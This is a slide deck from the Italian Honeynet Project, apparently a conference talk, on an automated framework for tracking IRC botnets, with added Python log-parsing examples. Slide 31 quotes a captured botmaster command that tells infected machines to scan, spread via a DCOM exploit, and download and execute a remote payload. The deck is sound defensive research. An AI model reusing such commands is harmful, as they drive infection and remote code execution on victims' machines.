An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization

An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization - PowerPoint PPT Presentation

Marco Riccardi, Italian Chapter - The Honeynet Project; Marco Cremonini


  1. An Open Botnet Analysis Framework for Automatic Tracking and Activity Visualization
  Marco Riccardi – Italian Chapter - The Honeynet Project
  Marco Cremonini – Dept. of Information Technology – Università di Milano

  2.
  • Defining the problem: IRC botnets
  • Defining the goal to achieve
  • The proposed solution: the Dorothy Framework
  • The realized proof of concept: honey-dorothy
  • Results
  • Case study: siwa botnet
  • Workplan
  • Conclusions

  3.
  • Botnets are considered one of the most dangerous threats
    ◦ Hard to keep pace with their evolution
    ◦ Hard to protect against their attacks
    ◦ Hard to mitigate
  • The time between Command and Control (C&C) identification and botnet mitigation is typically too long
  • Technical issues
  • Legal issues

  4.
  • A mitigation plan should be as quick as possible
  • Automation is required
  • …otherwise, human interaction is needed
    ◦ Considering the social context (legal, culture, etc.)
    ◦ All the countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) have to be clearly justified before their execution

  5.
  • A mitigation plan should be as quick as possible
  • Automation is required
  • …otherwise, human interaction is needed
    ◦ Considering the social context (legal, economic, operational, etc.)
    ◦ All countermeasures provided by ISPs/LEOs (blacklisting, DNS update, etc.) must be clearly justified before their implementation
  Developing a framework that automatically provides all the information needed by an ISP/LEO to activate a mitigation strategy

  6.
  • Automated framework for IRC botnet analysis
    ◦ Automatic malware acquisition & analysis
    ◦ Automatic C&C IRC channel infiltration
    ◦ Automatic activity status reporting
  • Interactive graphic front-end
  • Real-time information about monitored C&Cs
    ◦ Defenders can use this information to develop timely countermeasures to mitigate the risks
  • Customizable
    ◦ Defenders can be alerted when botnet activity is detected in their network

  7.
  • Malware Collection Module
  • Virtual Honeypot Injection Module
  • Network Analysis Module
  • Data Extraction Module

  8.
  • Infiltration Module
  • Geolocation Module
  • Live Data Extraction Module
  • Data Visualization Module
  • Web Graphical User Interface

  9.
  • Proposed proof of concept
  • Developed using the bash scripting language
    ◦ Fully compatible with POSIX systems
    ◦ Fully automated
  • Developed to be modular
    ◦ Easy integration with other tools
    ◦ Customizable
  • 90% of its components are open source
  • The Virtualization Module has been developed on VMware
  • A migration to VirtualBox is ongoing

  10.
  • Low-interaction honeypots (nepenthes)
  • All honeypots upload their malware samples to a central malware repository
  • Support for the Mwcollect Alliance repository has recently been added
  • Integration of a malware analysis module (static/dynamic) is ongoing

  11.
  • The virtualization environment has been developed on VMware
  • vmtools support the scripting implementation
  • The malware is executed on a virtual machine (Windows XP SP2)
  • After three minutes the VM is reverted to its original snapshot

  12.
  • Inspect the zombie's network behavior during the three minutes of infected VM execution
  • The network traffic is sniffed with tcpdump
  • The output is stored in a dump file and sent to the next module

  13.
  • The goal of this module is to extract all relevant information about C&Cs
  • The extracted information is used for botnet classification
    ◦ C&C IP addresses
    ◦ C&C satellites
    ◦ Associated hostnames
    ◦ Hostnames resolved by DNS servers
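As an added example (not the honey-dorothy code or the presentation's own), the following Python shows the kind of extraction this module performs over the tcpdump output of a sandbox run: it pairs the DNS queries the infected VM sent with their answers, then records every host the VM opened a TCP connection to, with its port and the name it was resolved from. The dump lines, addresses and the rule that IRC-style ports mark a C&C while HTTP hosts are satellites are assumptions for the example.

```python
import re

# Constructed `tcpdump -n` text output of one sandbox run (the dump file of
# slide 12); VM, resolver, C&C and satellite addresses are placeholders.
SAMPLE_DUMP = """\
IP 192.168.56.10.1034 > 192.168.56.1.53: 4660+ A? irc.cnc-example.net. (37)
IP 192.168.56.1.53 > 192.168.56.10.1034: 4660 1/0/0 A 203.0.113.7 (53)
IP 192.168.56.10.1035 > 203.0.113.7.6667: Flags [S], seq 1, win 64240, length 0
IP 203.0.113.7.6667 > 192.168.56.10.1035: Flags [S.], seq 2, ack 2, win 8192, length 0
IP 192.168.56.10.1036 > 192.168.56.1.53: 4661+ A? update.sat-example.org. (40)
IP 192.168.56.1.53 > 192.168.56.10.1036: 4661 1/0/0 A 198.51.100.9 (56)
IP 192.168.56.10.1037 > 198.51.100.9.80: Flags [S], seq 3, win 64240, length 0
IP 192.168.56.10.1038 > 203.0.113.7.6667: Flags [S], seq 4, win 64240, length 0
"""
PKT_RE = re.compile(r"^IP (\S+)\.(\d+) > (\S+)\.(\d+): (.*)$")
DNS_Q_RE = re.compile(r"^(\d+)\+ A\? (\S+)\. \(")                 # "txid+ A? name. (len)"
DNS_R_RE = re.compile(r"^(\d+) \d+/\d+/\d+ A (\d+(?:\.\d+){3})")  # "txid n/n/n A addr"
IRC_PORTS = {6667, 6668, 6669, 7000}   # assumption: IRC-style ports mark the C&C

def extract_cnc(dump_text, vm_ip):
    """Classify the infected VM's outbound connections into C&Cs and satellites."""
    pending, resolved = {}, {}          # DNS txid -> queried name; IP -> name
    cnc, satellites = {}, {}
    for line in dump_text.splitlines():
        m = PKT_RE.match(line)
        if not m:
            continue
        src, _sport, dst, dport, payload = m.groups()
        if src == vm_ip and (q := DNS_Q_RE.match(payload)):
            pending[q.group(1)] = q.group(2)                   # what the bot asked for
        elif dst == vm_ip and (r := DNS_R_RE.match(payload)):
            resolved[r.group(2)] = pending.pop(r.group(1), None)   # name behind the IP
        elif src == vm_ip and payload.startswith("Flags [S]"):     # outbound SYN
            bucket = cnc if int(dport) in IRC_PORTS else satellites
            rec = bucket.setdefault(dst, {"port": int(dport),
                                          "host": resolved.get(dst), "connections": 0})
            rec["connections"] += 1
    return {"cnc": cnc, "satellites": satellites}
```

Hosts contacted without a preceding DNS answer keep `host: None`, which is itself worth noting, since a hard-coded C&C IP will not show up in the DNS-based hostname lists.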

  14.
  • Infiltrate, Observe, Report
  • IRC-drone
    ◦ Fully written in bash
    ◦ Multichannel support
    ◦ Auto-responds to PING requests
    ◦ The drone injects all the IRC commands extracted from the traffic generated by the VM zombies as is
  • Compatible with non-IRC-compliant C&Cs
  • The connection toward the C&C is anonymized through the TOR network

  15.
  • All the data received from and sent to C&Cs is logged into txt files
  • Instant notification by email when:
    ◦ The topic changes
    ◦ A new command is issued by the bot master
    ◦ A MODE option is modified
  • A full module re-engineering is ongoing
    ◦ Multiplatform
    ◦ Support for more onion networks

  16.
  • Geolocation information gives an approximate geographical location of C&Cs
    ◦ Can be useful to consider the social context
  • Useful for understanding which law enforcement officer to notify
  • Provided by GeoCityLite
  • Free, good approximation

  17.
  • All log files generated by the IRC-drone are parsed
    ◦ Topic extraction
    ◦ Botmaster nickname / user host extraction
    ◦ Time delay calculation
      ◦ Between each topic modification
      ◦ Between each PING request (i.e. heartbeat)
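The parsing described on this slide, as an added example in Python (not the bash IRC-drone or any code from the project): it reads a constructed drone log, extracts TOPIC values and the botmaster's nick!user@host from the server prefix, computes the delays between topic modifications and between PING heartbeats (the averages charted on slide 33), and builds one notification line per TOPIC change or MODE modification as slide 15 describes. The log line layout, timestamps, nick and addresses are assumptions.

```python
import re
from datetime import datetime
from statistics import mean
# Constructed drone log ("<timestamp> <direction> <raw IRC line>"); its
# format, nicks and addresses are assumptions, not taken from the project.
SAMPLE_LOG = """\
2009-02-10 10:00:00 <-- PING :irc.cnc-example.net
2009-02-10 10:00:30 <-- :boss!~op@10.0.0.1 TOPIC ##siwa :* ipscan s.s dcom2 -s
2009-02-10 10:01:30 <-- PING :irc.cnc-example.net
2009-02-10 10:03:00 <-- PING :irc.cnc-example.net
2009-02-10 10:03:30 <-- :boss!~op@10.0.0.1 MODE ##siwa +m
2009-02-10 10:10:30 <-- :boss!~op@10.0.0.1 TOPIC ##siwa :* wormride on -s
"""
LINE_RE = re.compile(r"^(\S+ \S+) (<--|-->) (.*)$")
# TOPIC/MODE relayed by the server carry the issuer's nick!user@host prefix.
CTRL_RE = re.compile(r"^:(?P<nick>[^!]+)!(?P<user>[^@]+)@(?P<host>\S+) "
                     r"(?P<cmd>TOPIC|MODE) (?P<chan>\S+) ?:?(?P<arg>.*)$")

def parse_log(text):
    """Return (timestamp, kind, details) for PING heartbeats and TOPIC/MODE."""
    events = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m or m.group(2) != "<--":      # only lines received from the C&C
            continue
        ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
        if m.group(3).startswith("PING "):
            events.append((ts, "PING", {}))
        elif (c := CTRL_RE.match(m.group(3))):
            events.append((ts, c["cmd"], {k: c[k].strip() for k in
                           ("nick", "user", "host", "chan", "arg")}))
    return events

def intervals(events, kind):
    """Seconds between consecutive events of one kind."""
    ts = [e[0] for e in events if e[1] == kind]
    return [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]

def summarize(text):
    ev = parse_log(text)
    ctrl = [e for e in ev if e[1] in ("TOPIC", "MODE")]
    return {
        "topics": [e[2]["arg"] for e in ev if e[1] == "TOPIC"],
        "botmasters": sorted({"{nick}!{user}@{host}".format(**e[2]) for e in ctrl}),
        "avg_topic_delay": mean(intervals(ev, "TOPIC") or [0]),
        "avg_ping_delay": mean(intervals(ev, "PING") or [0]),
        # one notification line per topic change or MODE modification (slide 15)
        "alerts": ["{:%H:%M:%S} {} by {} on {}: {}".format(
            e[0], e[1], e[2]["nick"], e[2]["chan"], e[2]["arg"]) for e in ctrl],
    }
```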

  18. Parameters: IPs, Hosts, Ports, Zombies, Malwares, Chans, Satellites, ALL-Hosts, Mail Addr

  19. Legend (each entry is also distinguished by its own color)
  Shape    Meaning
  Circle   Targets
  Circle   C&C
  Circle   Satellites
  Circle   Spreading
  Circle   Spam
  Square   Services
  Triangle Source

  22. “Overview first, zoom and filter, then details on demand” (B. Shneiderman, The Eyes Have It: A Task by Data Type Taxonomy for Information Visualizations)

  23.
  • Tested for a period of 27 days between January and March 2009
  • Two public IPs used for malware acquisition
  • 3900 malware samples downloaded
    ◦ 304 unique
    ◦ 562,657 Mb downloaded
  • 16 unique C&Cs classified
    ◦ 50 IRC channels monitored
  • 8992 unique public IPs identified as zombies

  24.
  • Formed by 5 C&C servers
    ◦ 2 located in China
    ◦ 2 located in Canada
    ◦ 1 located in Holland
  • 7 different channel names used
    ◦ #siwa was the most used
  • 37 different C&C satellites providing the botnet updating service through HTTP
  • 42 host names related to siwa IP addresses
  • 4346 unique IP addresses identified as zombies

  25.
  • Redesign of the information flow management
    ◦ Information repository stored in a relational database
  • Evaluate developing the core engine in other programming languages
  • Integration of a malware analysis module
    ◦ Dynamic & static analysis
  • Virtual Honeypot: migration to VirtualBox

  26.
  • New module design and realization
    ◦ A module for analyzing P2P botnets
    ◦ A spam-trap implementation is ongoing
  • Development of a new IRC Drone
    ◦ Multiplatform, distributed

  27.
  • Data visualization tuning
    ◦ Investigating new ways of representing botnet data
  • Developing a new web interface
    ◦ More dynamic
    ◦ Multi-user / user customizable
  • Improve the notification process
    ◦ Mailing list
    ◦ Web 2.0 communication channels (twitter, feeds, blogs, ...)

  28.
  • The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
  • Today, there are different contributors supporting the project:
    ◦ Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tool (H.I.V.E) with honey-dorothy
    ◦ Three students from the University of Milan are developing new malware analysis modules
    ◦ The IHP Chapter has ten active participants who are contributing to the realization of a new version of the botnet analysis framework

  29.
  • The Dorothy Project is an ongoing activity of the Italian Honeynet Project (IHP) Chapter
  • Today, there are different contributors supporting the project:
    ◦ Two researchers of the University of Pavia are contributing by integrating their own botnet analysis tool (H.I.V.E) with honey-dorothy
    ◦ Three students from the University of Milan are developing new malware analysis modules
    ◦ The IHP Chapter has ten active participants who are contributing to the realization of a new version of the botnet analysis framework
  …we hope to receive your support too!

  30. The Italian Honeynet Chapter – www.honeynet.it
  Marco Riccardi – marco.riccardi [at] honeynet [dot] it
  Marco Cremonini – marco.cremonini [at] unimi [dot] it

  31.
  • Botmaster execution request
  ##pi## :* ipscan s.s dcom2 -s ][ * wormride on -s ][ * download http://72.xxx.xxx.xxx/mb2.exe -e -s
  • Zombies' response
  72.xxx.xxx.xxx:2293 --> :QfNUXNcm!~xqbmgz@92.xxx.xxx.xxx PRIVMSG ##RUSSIA## :-041- Running FTP wormride thread
  72.xxx.xxx.xxx:2293 --> :Tdkzdtwh!~bxoluj@mna75-4-82-225-77-1.yyy.yyy.net PRIVMSG ##russia## :- 04wormride- 1. tftp transfer to 82.xxx.xxx.xxx complete

  32.
  • Bar chart: number of DNS queries executed by the analyzed malware, grouped by C&C
  • Pie chart: number of DNS queries

  33.
  • Topic activity: average time between TOPIC changes
  • C&C heart-beat: average time between two PING requests

  34.
  • A full module re-engineering is ongoing
  • The new drone will be multiplatform
  • Anyone can support the infiltration process
  • It will support more than one onion network
  • It will send its logs to a central log concentrator
  • Integrity and confidentiality have to be managed accurately
